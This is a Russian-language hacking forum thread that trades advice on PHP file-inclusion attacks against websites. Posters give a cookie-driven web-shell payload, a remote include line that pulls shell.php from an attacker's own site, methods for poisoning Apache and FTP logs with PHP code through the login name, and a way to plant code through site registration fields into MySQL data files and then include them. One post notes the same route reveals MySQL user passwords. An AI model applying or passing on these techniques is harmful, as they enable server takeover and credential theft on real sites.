забей на куки
вместо
<? system($_COOKIE[cmd]);?>
посылай
<? include('http://твой_сайт.ru/shell.php'); ?>

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

Не обязательно лог апача =))) разве в системе есть только они? )
А какже логи фтп сервера ? ) пути к которым можно узнать из их кфг файла. Тоесть опять же. мы логинимся с логином
а затем инклудим еррор лог от стоящего фтпшника.. (ну или акцеслог).. вообще бываает что запись идет в оба. (Именно логин а непасс, т.к. Пасс даже не коректный НЕ показывается в логах)

__________________

я думаю там проканает только локальный инклуд! из вне наврятли!

2 Dread
А ты лучше ну думай, а посмотри в phpinfo() директиву allow_url_fopen, и будешь знать навернека.

наркоманы наступают =)) при чем тут это )))

Great: да не то слово просто =\

__________________

Пардон за некрофилию, но вопрос встал ребром:

что делать, если и access.log и error.log такого большого размера, что в память php не влазят (> 8 Мб)? и система win, так что /proc/self/environ не поюзать

искать другие файлы, в которые можно записать инфу и инклюдить

это понятно, ты бы хоть намекнул какие это могут быть файлы. можно в лс.

Можешь попробывать подинклудить файл базы данных.

C:/program files/mysql5.0.45/data/mysql

К примеру на сайте зарегистрировать пользователя и в регистрационных данных указать

которые в последствии запишутся в бд.

Допустим shema_name(site) и table_name(users).

Тогда данный php код будет находится

Естественно версия мускула в пути будет твоя.

После этого можешь попытаться подинклудить php код.

PS.

Таким же образом можно прочитать мускульные пароли пользователей.